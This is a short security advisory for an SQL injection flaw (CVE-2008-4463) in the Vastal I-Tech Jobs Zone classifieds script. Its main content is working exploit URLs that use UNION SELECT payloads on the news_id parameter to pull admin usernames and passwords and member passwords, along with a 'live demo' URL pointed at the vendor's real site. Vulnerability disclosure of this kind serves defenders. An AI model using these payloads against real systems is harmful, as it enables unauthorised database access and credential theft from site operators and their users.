Topic : | Vastal I-Tech Jobs Zone (news_id) SQL Injection Vulnerability
|
SecurityAlert : 4358
CVE : CVE-2008-4463
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Stack
Published : 09.10.2008
Affected Software : | vastal_i-tech:jobs_zone |
 Advisory Content : #######################################################
# Vastal I-Tech Jobs Zone SQL Injection Vulnerability
#
# Author : Stack
#
#
# Script Home Page :
http://www.vastal.com/jobs-zone-classifieds-script.html
#
# Demo : http://www.vastal.com/jobs/
#######################################################
Exploit:
http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0
x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0
x3a,password,user()),version(),4,5,6,7/**/from/**/members/*
Live Demo
http://www.vastal.com/jobs/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1
,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users
/*
###########################################################################
###################################
References :
http://securityreason.com/expldownload/1/4606/1 (Exploit)
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|